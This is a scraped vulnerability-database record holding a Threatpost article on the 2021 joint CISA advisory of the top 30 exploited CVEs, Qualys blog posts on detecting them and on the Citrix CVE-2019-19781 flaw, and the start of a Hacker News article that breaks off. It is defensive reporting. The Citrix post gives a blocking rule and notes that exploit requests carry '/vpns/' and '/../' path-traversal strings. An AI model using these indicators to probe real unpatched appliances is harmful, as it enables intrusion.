{"id": "THREATPOST:8D6D4C10987CBF3434080EFF240D2E74", "type": "threatpost", "bulletinFamily": "info", "title": "CISA\u2019s Top 30 Bugs: One\u2019s Old Enough to Buy Beer", "description": "In a perfect world, CISA would laminate cards with the year\u2019s top 30 vulnerabilities: You could whip it out and ask a business if they\u2019ve bandaged these specific wounds before you hand over your cash.\n\nThis is not a perfect world. There are no laminated vulnerability cards.\n\nBut at least we have the list: In a joint advisory ([PDF](<https://us-cert.cisa.gov/sites/default/files/publications/AA21-209A_Joint%20CSA_Top%20Routinely%20Exploited%20Vulnerabilities.pdf>)) published Wednesday, the FBI and Cybersecurity and Infrastructure Security Agency (CISA), the Australian Cyber Security Center, and the UK\u2019s National Cyber Security Center listed the vulnerabilities that were \u201croutinely\u201d exploited in 2020, as well as those that are most often being picked apart so far this year.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe vulnerabilities \u2013 which lurk in devices or software from the likes of Citrix, Fortinet, Pulse Secure, Microsoft and Atlassian \u2013 include publicly known bugs, some of which are growing hair. One, in fact, dates to 2000.\n\n\u201cCyber actors continue to exploit publicly known \u2013 and often dated \u2013 software vulnerabilities against broad target sets, including public and private sector organizations worldwide,\u201d according to the advisory. \u201cHowever, entities worldwide can mitigate the vulnerabilities listed in this report by applying the available patches to their systems and implementing a centralized patch management system.\u201d\n\nSo far this year, cyberattackers are continuing to target vulnerabilities in perimeter-type devices, with particularly high amounts of unwanted attention being devoted to flaws in the perimeter devices sold by Microsoft, Pulse, Accellion, VMware and Fortinet.\n\nAll of the vulnerabilities have received patches from vendors. That doesn\u2019t mean those patches have been applied, of course.\n\n## Repent, O Ye Patch Sinners\n\nAccording to the advisory, attackers are unlikely to stop coming after geriatric vulnerabilities, including CVE-2017-11882: a Microsoft Office remote code execution (RCE) bug that was already near drinking age when it was [patched at the age of 17](<https://threatpost.com/microsoft-patches-17-year-old-office-bug/128904/>) in 2017.\n\nWhy would they stop? As long as systems remain unpatched, it\u2019s a win-win for adversaries, the joint advisory pointed out, as it saves bad actors time and effort.\n\n> Adversaries\u2019 use of known vulnerabilities complicates attribution, reduces costs, and minimizes risk because they are not investing in developing a zero-day exploit for their exclusive use, which they risk losing if it becomes known. \u2014Advisory\n\nIn fact, the top four preyed-upon 2020 vulnerabilities were discovered between 2018 to 2020, showing how common it is for organizations using the devices or technology in question to sidestep patching or remediation.\n\nThe top four:\n\n * [CVE-2019-19781](<https://threatpost.com/critical-citrix-rce-flaw-corporate-lans/152677/>), a critical bug in the Citrix Application Delivery Controller (ADC) and Citrix Gateway that left unpatched outfits at risk from a trivial attack on their internal operations. As of December 2020, 17 percent \u2013 about one in five of the 80,000 companies affected \u2013 hadn\u2019t patched.\n * [CVE 2019-11510](<https://threatpost.com/dhs-urges-pulse-secure-vpn-users-to-update-passwords/154925/>): a critical Pulse Secure VPN flaw exploited in several cyberattacks that targeted companies that had previously patched a related flaw in the VPN. In April 2020, the Department of Homeland Security (DHS) urged users to change their passwords for [Active Directory](<https://threatpost.com/podcast-securing-active-directory-nightmare/168203/>) accounts, given that the patches were deployed too late to stop bad actors from compromising those accounts.\n * [CVE 2018-13379](<https://threatpost.com/fbi-apts-actively-exploiting-fortinet-vpn-security-holes/165213/>): a path-traversal weakness in VPNs made by Fortinet that was discovered in 2018 and which was actively being exploited as of a few months ago, in April 2021.\n * [CVE 2020-5902](<https://threatpost.com/patch-critical-f5-flaw-active-attack/157164/>): a critical vulnerability in F5 Networks\u2019 BIG-IP advanced delivery controller networking devices that, as of July 2020, was being exploited by attackers to scrape credentials, launch malware and more.\n\nThe cybersecurity bodies urged organizations to remediate or mitigate vulnerabilities as soon as possible to reduce their risk of being ripped up. For those that can\u2019t do that, the advisory encouraged organizations to check for the presence of indicators of compromise (IOCs).\n\nIf IOCs are found, kick off incident response and recovery plans, and let CISA know: the advisory contains instructions on how to report incidents or request technical help.\n\n## 2020 Top 12 Exploited Vulnerabilities\n\nHere\u2019s the full list of the top dozen exploited bugs from last year:\n\n**Vendor** | **CVE** | **Type** \n---|---|--- \nCitrix | CVE-2019-19781 | arbitrary code execution \nPulse | CVE 2019-11510 | arbitrary file reading \nFortinet | CVE 2018-13379 | path traversal \nF5- Big IP | CVE 2020-5902 | remote code execution (RCE) \nMobileIron | CVE 2020-15505 | RCE \nMicrosoft | CVE-2017-11882 | RCE \nAtlassian | CVE-2019-11580 | RCE \nDrupal | CVE-2018-7600 | RCE \nTelerik | CVE 2019-18935 | RCE \nMicrosoft | CVE-2019-0604 | RCE \nMicrosoft | CVE-2020-0787 | elevation of privilege \nNetlogon | CVE-2020-1472 | elevation of privilege \n \n## Most Exploited So Far in 2021\n\nCISA et al. also listed these 13 flaws, all discovered this year, that are also being energetically exploited:\n\n * Microsoft Exchange: CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE2021-27065: four flaws that can be chained together in the ProxyLogon group of security bugs that led to a [patching frenzy](<https://threatpost.com/microsoft-exchange-servers-proxylogon-patching/165001/>). The frenzy was warranted: as of March, Microsoft said that 92 percent of Exchange Servers were vulnerable to [ProxyLogon](<https://threatpost.com/microsoft-exchange-exploits-ransomware/164719/>).\n * Pulse Secure: CVE-2021-22893, CVE-2021-22894, CVE-2021-22899, and CVE-2021-22900. As of May, CVE-2021-22893 was being used by at least two advanced persistent threat actors (APTs), likely linked to China, [to attack U.S. defense targets,](<https://threatpost.com/pulse-secure-vpns-fix-critical-zero-day-bugs/165850/>) among others.\n * Accellion: CVE-2021-27101, CVE-2021-27102, CVE-2021-27103, CVE-2021-27104. These ones led to scads of attacks, including [on Shell](<https://threatpost.com/shell-victim-of-accellion-attacks/164973/>). Around 100 Accellion FTA customers, including the [Jones Day Law Firm](<https://threatpost.com/stolen-jones-day-law-firm-files-posted/164066/>), Kroger [and Singtel](<https://threatpost.com/singtel-zero-day-cyberattack/163938/>), were affected by attacks [tied to FIN11 and the Clop ransomware gang](<https://threatpost.com/accellion-zero-day-attacks-clop-ransomware-fin11/164150/>).\n * VMware: CVE-2021-21985: A [critical bug](<https://threatpost.com/vmware-ransomware-alarm-critical-bug/166501/>) in VMware\u2019s virtualization management platform, vCenter Server, that allows a remote attacker to exploit the product and take control of a company\u2019s affected system.\n\nThe advisory gave technical details for all these vulnerabilities along with guidance on mitigation and IOCs to help organizations figure out if they\u2019re vulnerable or have already been compromised. The advisory also offers guidance for locking down systems.\n\n## Can Security Teams Keep Up?\n\nRick Holland, Digital Shadows CISO and vice president of strategy, called CISA vulnerability alerts an \u201cinfluential tool to help teams stay above water and minimize their attack surface.\u201d\n\nThe CVEs highlighted in Wednesday\u2019s alert \u201ccontinue to demonstrate that attackers are going after known vulnerabilities and leverage zero-days only when necessary,\u201d he told Threatpost on Thursday.\n\nRecent research ([PDF](<https://l.vulcancyber.com/hubfs/Infographics/Pulse%20research%20project%20-%202021-07-23%20-%20How%20are%20Businesses%20Mitigating%20Cyber%20Risk.pdf>)) from Vulcan Cyber has found that more than three-quarters of cybersecurity leaders have been impacted by a security vulnerability over the past year. It begs the question: Is there a mismatch between enterprise vulnerability management programs and the ability of security teams to mitigate risk?\n\nYaniv Bar-Dayan, CEO and co-founder at Vulcan Cyber, a provider of SaaS for enterprise cyber risk remediation, suggested that it\u2019s become ever more vital for enterprise IT security stakeholders to make \u201cmeaningful changes to their cyber hygiene efforts.\u201d That means \u201cprioritizing risk-based cybersecurity efforts, increasing collaboration between security and IT teams, updating vulnerability management tooling, and enhancing enterprise risk analytics, especially in businesses with advanced cloud application programs.\u201d\n\nGranted, vulnerability management is \u201cone of the most difficult aspects of any security program,\u201d he continued. But if a given vulnerability is being exploited, that should kick it up the priority list, Var-Dayan said. \u201cTaking a risk-based approach to vulnerability management is the way forward; and teams should unquestionably be prioritizing vulnerabilities that are actively being exploited.\u201d\n\n072921 15:02 UPDATE: Corrected misattribution of quotes.\n\nWorried about where the next attack is coming from? We\u2019ve got your back. **[REGISTER NOW](<https://threatpost.com/webinars/how-to-think-like-a-threat-actor/?utm_source=ART&utm_medium=ART&utm_campaign=August_Uptycs_Webinar>)** for our upcoming live webinar, How to **Think Like a Threat Actor**, in partnership with Uptycs on Aug. 17 at 11 AM EST and find out precisely where attackers are targeting you and how to get there first. Join host Becky Bracken and Uptycs researchers Amit Malik and Ashwin Vamshi on **[Aug. 17 at 11AM EST for this LIVE discussion](<https://threatpost.com/webinars/how-to-think-like-a-threat-actor/?utm_source=ART&utm_medium=ART&utm_campaign=August_Uptycs_Webinar>)**.\n", "published": "2021-07-29T18:39:56", "modified": "2021-07-29T18:39:56", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 10.0, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 10.0, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 6.0}, "href": "https://threatpost.com/cisa-top-bugs-old-enough-to-buy-beer/168247/", "reporter": "Lisa Vaas", "references": ["https://us-cert.cisa.gov/sites/default/files/publications/AA21-209A_Joint%20CSA_Top%20Routinely%20Exploited%20Vulnerabilities.pdf", "https://threatpost.com/newsletter-sign/", "https://threatpost.com/microsoft-patches-17-year-old-office-bug/128904/", "https://threatpost.com/critical-citrix-rce-flaw-corporate-lans/152677/", "https://threatpost.com/dhs-urges-pulse-secure-vpn-users-to-update-passwords/154925/", "https://threatpost.com/podcast-securing-active-directory-nightmare/168203/", "https://threatpost.com/fbi-apts-actively-exploiting-fortinet-vpn-security-holes/165213/", "https://threatpost.com/patch-critical-f5-flaw-active-attack/157164/", "https://threatpost.com/microsoft-exchange-servers-proxylogon-patching/165001/", "https://threatpost.com/microsoft-exchange-exploits-ransomware/164719/", "https://threatpost.com/pulse-secure-vpns-fix-critical-zero-day-bugs/165850/", "https://threatpost.com/shell-victim-of-accellion-attacks/164973/", "https://threatpost.com/stolen-jones-day-law-firm-files-posted/164066/", "https://threatpost.com/singtel-zero-day-cyberattack/163938/", "https://threatpost.com/accellion-zero-day-attacks-clop-ransomware-fin11/164150/", "https://threatpost.com/vmware-ransomware-alarm-critical-bug/166501/", "https://l.vulcancyber.com/hubfs/Infographics/Pulse%20research%20project%20-%202021-07-23%20-%20How%20are%20Businesses%20Mitigating%20Cyber%20Risk.pdf", "https://threatpost.com/webinars/how-to-think-like-a-threat-actor/?utm_source=ART&utm_medium=ART&utm_campaign=August_Uptycs_Webinar", "https://threatpost.com/webinars/how-to-think-like-a-threat-actor/?utm_source=ART&utm_medium=ART&utm_campaign=August_Uptycs_Webinar"], "cvelist": ["CVE-2017-11882", "CVE-2018-7600", "CVE-2019-0604", "CVE-2019-11580", "CVE-2019-19781", "CVE-2020-0787", "CVE-2020-1472", "CVE-2021-21985", "CVE-2021-22893", "CVE-2021-22894", "CVE-2021-22899", "CVE-2021-22900", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27101", "CVE-2021-27102", "CVE-2021-27103", "CVE-2021-27104"], "immutableFields": [], "lastseen": "2021-07-30T09:53:38", "viewCount": 282, "enchantments": {"dependencies": {"references": [{"type": "qualysblog", "idList": ["QUALYSBLOG:82E24C28622F0C96140EDD88C6BD8F54", "QUALYSBLOG:8DC9B53E981BBE193F6EC369D7FA85F8"]}, {"type": "thn", "idList": ["THN:582576397E2C98200C7C952401392B5B", "THN:FA7EFA3A74BF3490AD84EA169EA6C4CA", "THN:43A16BBDCD3B020E360EE37C48B44088", "THN:B95DC27A89565323F0F8E6350D24D801", "THN:9AB21B61AFE09D4EEF533179D0907C03", "THN:9DB02C3E080318D681A9B33C2EFA8B73"]}, {"type": "threatpost", "idList": ["THREATPOST:CBC82B4313EA17CA9EF4CA959D4623DB", "THREATPOST:DC270F423257A4E0C44191BE365F25CB", "THREATPOST:7E76268AD6AABF30EEE441619FF98ABF", "THREATPOST:54430D004FBAE464FB7480BC724DBCC8", "THREATPOST:3661EA0D8FCA17978A471DB91405999A", "THREATPOST:B64BFE4F560527B57D4157D27CF3E553", "THREATPOST:BADA213290027D414693E838771F8645", "THREATPOST:08A2169F63C4AABB07644BEF5A5D56AC", "THREATPOST:DAA85537BDD9022F1F98B328EFF7B7B9", "THREATPOST:B53DDA5AD9C6530F631391E064A0D4FA", "THREATPOST:A4C1190B664DAE144A62459611AC5F4A", "THREATPOST:312E32AA4DC31CFD90D946BC7E36088B", "THREATPOST:CAA77BB0CF0093962ECDD09004546CA3", "THREATPOST:B787E57D67AB2F76B899BCC525FF6870", "THREATPOST:247CA39D4B32438A13F266F3A1DED10E", "THREATPOST:153B5C59C5DB1F87B3DFE2D673FA0030", "THREATPOST:2DFBDDFFE3121143D95705C4EA525C7A", "THREATPOST:18D24326B561A78A05ACB7E8EE54F396", "THREATPOST:127A1AE48CF081BC8DD70A28E9CA0ABE"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:9DE0CE48F84BCF9764A6FA0372DB2AD1", "IMPERVABLOG:7B28F00C5CD12AC5314EB23EAE40413B"]}, {"type": "fireeye", "idList": ["FIREEYE:A728AA190E170AFDE8BF140059E0D0D5", "FIREEYE:C650A7016EEAD895903FB350719E53E3"]}, {"type": "nessus", "idList": ["PULSE_CONNECT_SECURE-SA44784.NASL", "VMWARE_VCENTER_CVE-2021-21985.NBIN"]}, {"type": "cve", "idList": ["CVE-2021-22899", "CVE-2021-27101", "CVE-2021-27102", "CVE-2021-22893", "CVE-2021-22894", "CVE-2021-21985", "CVE-2021-26858", "CVE-2021-22900", "CVE-2021-27103", "CVE-2021-27104"]}, {"type": "attackerkb", "idList": ["AKB:DF071775-CD3A-4643-9E29-3368BD93C00F", "AKB:C0BD1D9D-A70C-4932-96C2-8DE83CA489E6", "AKB:5D17BB38-86BB-4514-BF1D-39EB48FBE4F1", "AKB:AFC76977-D355-470D-A7F6-FEF7A8352B65", "AKB:462BB7BE-5D1C-4847-AE1A-07B008F34C9D", "AKB:30E011CE-C422-42D7-BC8C-EFFC7B3B11A3", "AKB:FF495201-9E29-4561-AE45-888E59E30E1B", "AKB:B983621D-529B-4375-AA6C-0DB0FBBF9A94", "AKB:8E9F0DC4-BC72-4340-B70E-5680CA968D2B", "AKB:5BE82C1E-061F-4C04-93A2-1C15BBDE9337"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/FILEFORMAT/OFFICE_MS17_11882/", "MSF:ILITIES/MSFT-CVE-2021-26857/", "MSF:ILITIES/VMSA-2021-0010-CVE-2021-21985-VCENTER/", "MSF:EXPLOIT/WINDOWS/FILEFORMAT/OFFICE_MS17_11882", "MSF:ILITIES/MSFT-CVE-2021-26858/"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2020-1472", "UB:CVE-2018-7600"]}, {"type": "redhatcve", "idList": ["RH:CVE-2020-1472"]}, {"type": "atlassian", "idList": ["ATLASSIAN:CWD-5388"]}, {"type": "f5", "idList": ["F5:K22854260"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:F4F1A7CFCF2440B1B23C1904402DDAF2", "RAPID7BLOG:7103223D85FA1742C265703CC8D3EE7C", "RAPID7BLOG:A567BCDA66AFFA88D0476719CB5D934D", "RAPID7BLOG:6A1F743B64899419F505BFE243BD179F"]}, {"type": "akamaiblog", "idList": ["AKAMAIBLOG:09A31B56FFEA13FBA5985C1B2E66133B", "AKAMAIBLOG:BB43372E19E8CF90A965E98130D0C070", "AKAMAIBLOG:30D20162B95C09229EEF2C09C5D98FCA"]}, {"type": "hivepro", "idList": ["HIVEPRO:0E3B824DCD3B82D06D8078A118E98B54"]}, {"type": "cisa", "idList": ["CISA:134C272F26FB005321448C648224EB02", "CISA:433F588AAEF2DF2A0B46FE60687F19E0", "CISA:16DE226AFC5A22020B20927D63742D98", "CISA:61F2653EF56231DB3AEC3A9E938133FE", "CISA:7FB0A467C0EB89B6198A58418B43D50C"]}, {"type": "msrc", "idList": ["MSRC:96F2FB0D77EED0ABDED8EBD64AEBEA09", "MSRC:ED939F90BDE8D7A32031A750388B03C9"]}, {"type": "mssecure", "idList": ["MSSECURE:28641FE2F73292EB4B26994613CC882B"]}, {"type": "securelist", "idList": ["SECURELIST:DF3251CC204DECD6F24CA93B7A5701E1", "SECURELIST:403B2D76CFDBDAB0862F6860A95E54B4"]}, {"type": "krebs", "idList": ["KREBS:65D25A653F7348C7F18FFD951447B275"]}, {"type": "talosblog", "idList": ["TALOSBLOG:AC8ED8970F5692A325A10D93B7F0D965"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:C9B38F7962606C41AA16ECBD4E48D712"]}, {"type": "mmpc", "idList": ["MMPC:28641FE2F73292EB4B26994613CC882B"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:B4D157FAC0EB655355514D120382CC56"]}, {"type": "hackerone", "idList": ["H1:1119224", "H1:1119228"]}, {"type": "symantec", "idList": ["SMNTC-101757", "SMNTC-106914", "SMNTC-111238"]}, {"type": "seebug", "idList": ["SSV:99260", "SSV:97207"]}, {"type": "vmware", "idList": ["VMSA-2021-0010"]}], "modified": "2021-07-30T09:53:38", "rev": 2}, "score": {"value": 5.9, "vector": "NONE", "modified": "2021-07-30T09:53:38", "rev": 2}, "vulnersScore": 5.9}}

{"qualysblog": [{"lastseen": "2021-08-02T20:34:35", "description": "On July 28, 2021, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) released a [cybersecurity advisory](<https://us-cert.cisa.gov/ncas/alerts/aa21-209a>) detailing the top 30 publicly known vulnerabilities that have been routinely exploited by cyber threat actors in 2020 and 2021. Organizations are advised to prioritize and apply patches or workarounds for these vulnerabilities as soon as possible.\n\nThe advisory states, \u201cIf an organization is unable to update all software shortly after a patch is released, prioritize implementing patches for CVEs that are already known to be exploited or that would be accessible to the largest number of potential attackers (such as internet-facing systems).\u201d\n\nCISA released the advisory in conjunction with the Australian Cyber Security Centre (ACSC), the United Kingdom\u2019s National Cyber Security Centre (NCSC), and the U.S. Federal Bureau of Investigation (FBI).\n\nThe CISA advisory is similar in scope to the October 2020 United States National Security Agency (NSA) [cybersecurity advisory](<https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF>) listing the top 25 known vulnerabilities being actively used by Chinese state-sponsored cyber actors [that security teams can detect and mitigate or remediate](<https://blog.qualys.com/product-tech/2020/10/22/nsa-alert-chinese-state-sponsored-actors-exploit-known-vulnerabilities>) in their infrastructure using Qualys VMDR.\n\n### Top Routinely Exploited Vulnerabilities\n\nHere is the list of top routinely exploited vulnerabilities in 2020 and 2021 along with affected products and associated Qualys VMDR QID(s) for each vulnerability.\n\n**CVE-IDs**| **Affected Products**| **Qualys Detections (QIDs)** \n---|---|--- \nCVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065| Microsoft Exchange| 50107, 50108 \nCVE-2021-22893, CVE-2021-22894, CVE-2021-22899, CVE-2021-22900| Pulse Secure| 38838 \nCVE-2021-27101, CVE-2021-27102, CVE-2021-27103, CVE-2021-27104| Accellion| 38830 \nCVE-2021-21985| VMware| 730102, 216261, 216260, 216259 \nCVE-2018-13379, CVE-2020-12812, CVE-2019-5591| Fortinet| 43702, 43769, 43825 \nCVE-2019-19781| Citrix| 150273, 372305, 372685 \nCVE-2019-11510| Pulse| 38771 \nCVE-2018-13379| Fortinet| 43702 \nCVE-2020-5902| F5- Big IP| 38791, 373106 \nCVE-2020-15505| MobileIron| 13998 \nCVE-2017-11882| Microsoft| 110308 \nCVE-2019-11580| Atlassian| 13525 \nCVE-2018-7600| Drupal| 371954, 150218, 277288, 176337, 11942 \nCVE-2019-18935| Telerik| 150299, 372327 \nCVE-2019-0604| Microsoft| 110330 \nCVE-2020-0787| Microsoft| 91609 \nCVE-2020-1472| Netlogon| 91688 \n \n### Detect CISA\u2019s Top Routinely Exploited Vulnerabilities using Qualys VMDR\n\nQualys released several remote and authenticated detections (QIDs) for the vulnerabilities. You can search for these QIDs in VMDR Dashboard using the following QQL query:\n\n__vulnerabilities.vulnerability.cveIds: [_`_CVE-2021-26855`,`CVE-2021-26857`,`CVE-2021-26858`,`CVE-2021-27065`,`CVE-2021-22893`,`CVE-2021-22894`,`CVE-2021-22899`,`CVE-2021-22900`,`CVE-2021-27101`,`CVE-2021-27102`,`CVE-2021-27103`,`CVE-2021-27104`,`CVE-2021-21985`,` CVE-2018-13379`,`CVE-2020-12812`,`CVE-2019-5591`,`CVE-2019-19781`,`CVE-2019-11510`,`CVE-2018-13379`,`CVE-2020-5902`,`CVE-2020-15505`,`CVE-2017-11882`,`CVE-2019-11580`,`CVE-2019-18935`,`CVE-2019-0604`,`CVE-2020-0787`,`CVE-2020-1472`]__\n\n\n\nUsing [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>), customers can effectively prioritize this vulnerability for \u201cActive Attack\u201d RTI:\n\n\n\nWith VMDR Dashboard, you can track top 30 publicly known exploited vulnerabilities, their impacted hosts, their status and overall management in real time. With trending enabled for dashboard widgets, you can keep track of these vulnerabilities trends in your environment using the [\u201cCISA: Alert (AA21-209A) | Top Exploited\u201d dashboard](<https://success.qualys.com/support/s/article/000006738>).\n\n\n\n### Recommendations\n\nAs guided by CISA, one must do the following to protect assets from being exploited:\n\n * Minimize gaps in personnel availability and consistently consume relevant threat intelligence.\n * Organizations\u2019 vigilance team should keep a close eye on indications of compromise (IOCs) as well as strict reporting processes.\n * Regular incident response exercises at the organizational level are always recommended as a proactive approach.\n * Organizations should require multi-factor authentication to remotely access networks from external sources, especially for administrator or privileged accounts.\n * Focus cyber defense resources on patching those vulnerabilities that cyber actors most often use.\n\n### Remediation and Mitigation\n\n * Patch systems and equipment promptly and diligently.\n * Implement rigorous configuration management programs.\n * Disable unnecessary ports, protocols, and services.\n * Enhance monitoring of network and email traffic.\n * Use protection capabilities to stop malicious activity.\n\n### Get Started Now\n\nStart your [_Qualys VMDR trial_](<https://www.qualys.com/subscriptions/vmdr/>) to automatically detect and mitigate or remediate the CISA top 30 publicly known vulnerabilities that have been routinely exploited by cyber threat actors in 2020 and 2021.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-07-29T00:20:27", "type": "qualysblog", "title": "CISA Alert: Top Routinely Exploited Vulnerabilities", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882", "CVE-2018-13379", "CVE-2018-7600", "CVE-2019-0604", "CVE-2019-11510", "CVE-2019-11580", "CVE-2019-18935", "CVE-2019-19781", "CVE-2019-5591", "CVE-2020-0787", "CVE-2020-12812", "CVE-2020-1472", "CVE-2020-15505", "CVE-2020-5902", "CVE-2021-21985", "CVE-2021-22893", "CVE-2021-22894", "CVE-2021-22899", "CVE-2021-22900", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-27101", "CVE-2021-27102", "CVE-2021-27103", "CVE-2021-27104"], "modified": "2021-07-29T00:20:27", "id": "QUALYSBLOG:8DC9B53E981BBE193F6EC369D7FA85F8", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-20T12:15:15", "description": "**Update January 17, 2020**: A new detection in Qualys Web Application Scanning was added. See \"Detecting with Qualys WAS\" below.\n\nCitrix released a [security advisory](<https://support.citrix.com/article/CTX267027>) ([CVE-2019-19781](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19781>)) for a remote code execution vulnerability in Citrix Application Delivery Controller (ADC) and Citrix Gateway products. The vulnerability allows an unauthenticated remote attacker to execute arbitrary code on the system. Once exploited, remote attackers could obtain access to private network resources without requiring authentication.\n\nDuring the week of January 13, [attacks on Citrix appliances](<https://threatpost.com/unpatched-citrix-flaw-exploits/151748/>) have [intensified](<https://www.zdnet.com/article/a-hacker-is-patching-citrix-servers-to-maintain-exclusive-access/>). Because of the active attacks and the ease of exploitation, organizations are advised to pay close attention.\n\n### About CVE-2019-19781\n\nThe vulnerability affects all supported versions of Citrix ADC and Citrix Gateway products. As Citrix did not disclose many details about the vulnerability, the [mitigation steps](<https://support.citrix.com/article/CTX267679>) suggest the VPN handler fails to sufficiently sanitize user-supplied inputs. The exploit attempt would include HTTP requests with \u2018/../\u2019 and \u2018/vpns/\u2019 in the URL. The responder policy rule checks for string \u201c/vpns/\" and if user is connected to the SSLVPN, and sends a 403 response as seen below.\n\n_add responder policy ctx267027 \"HTTP.REQ.URL.DECODE_USING_TEXT_MODE.CONTAINS(\\\"/vpns/\\\") &amp;&amp; (!CLIENT.SSLVPN.IS_SSLVPN || HTTP.REQ.URL.DECODE_USING_TEXT_MODE.CONTAINS(\\\"/../\\\"))\" respondwith403 _\n\n### Detecting with Qualys VM\n\nQualys has issued QID 372305 for [Qualys Vulnerability Management](<https://www.qualys.com/apps/vulnerability-management/>) that includes authenticated and remote detections of vulnerabilities present in affected Citrix products. This QID is included in signature version VULNSIGS-2.4.788-2.\n\n_QID 372305 : Citrix ADC And Citrix Gateway Arbitrary Code Execution Vulnerability (CTX267027)_\n\nThe QID contains a remote and an authenticated signature to check the presence of vulnerability in Citrix Products. \nYou can search for this new QID in AssetView or within the VM Dashboard by using the following QQL query:\n\n_vulnerabilities.vulnerability.qid:372305_ \n_vulnerabilities.vulnerability.cveId:`CVE-2019-19781`_\n\nThis will return a list of all impacted hosts.\n\nYou can also create a Dashboard to track all Citrix vulnerabilities as shown in the template below:\n\n\n\n \n\n### Detecting with Qualys Threat Protection\n\nThe fastest way to locate vulnerable hosts is though the [Qualys Threat Protection](<https://www.qualys.com/apps/threat-protection/>) Live Feed as seen here:\n\n\n\nSimply click on the Impacted Assets number to see a list of hosts with this vulnerability.\n\n### Detecting with Qualys WAS\n\nQualys has released QID 150273 in [Qualys Web Application Scanning](<https://www.qualys.com/apps/web-app-scanning/>) (WAS) that includes a passive detection of vulnerabilities present in the affected Citrix products.\n\n_QID 150273 : Citrix ADC And Citrix Gateway Arbitrary Code Execution Vulnerability (CTX267027)_\n\nThis detection is useful for customers using Qualys WAS in their environments, and it has the advantage of detecting both at the root level of the target being scanned **and** at the starting URL of the web application as specified in the WAS configuration.\n\nThe passive detection works by sending an HTTPS request and looking for evidence of the vulnerability in the response. If the scanned application is vulnerable, the QID will be reported in your Qualys WAS scan report.\n\n### Mitigation\n\nCustomers are recommended to apply Citrix\u2019s [Mitigation Steps for CVE-2019-19781](<https://support.citrix.com/article/CTX267679>) as soon as possible.\n\nCustomers can check their systems for exploit attempts using \u201cgrep\u201d for requests that contain \u201cvpns\u201d and \u201c..\u201d.\n\nA patch is expected from Citrix by the end of January 2020, and organizations are advised to install that patch as soon as it is available.", "cvss3": {}, "published": "2020-01-09T00:12:26", "type": "qualysblog", "title": "Citrix ADC and Gateway Remote Code Execution Vulnerability (CVE-2019-19781)", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2019-19781"], "modified": "2020-01-09T00:12:26", "id": "QUALYSBLOG:82E24C28622F0C96140EDD88C6BD8F54", "href": "https://blog.qualys.com/laws-of-vulnerabilities/2020/01/08/citrix-adc-and-gateway-remote-code-execution-vulnerability-cve-2019-19781", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "thn": [{"lastseen": "2021-08-04T10:34:10", "description": "[](<https://thehackernews.com/images/-_sUoUckANJU/YQJlBsicySI/AAAAAAAADX0/BEDLvJhwqzYImk1o5ewZhnKeXxnoL0D0wCLcBGAsYHQ/s0/Security-Vulnerabilities.jpg>)\n\nIntelligence agencies in Australia, the U.K., and the U.S. issued a joint advisory on Wednesday detailing the most exploited vulnerabilities in 2020 and 2021, once again demonstrating how threat actors are able to swiftly weaponize publicly disclosed flaws to their advantage.\n\n\"Cyber actors continue to exploit publicly known\u2014and often dated\u2014software vulnerabilities against broad target sets, including public and private sector organizations worldwide,\" the U.S. Cybersecurity and Infrastructure Security Agency (CISA), the Australian Cyber Security Centre (ACSC), the United Kingdom's National Cyber Security 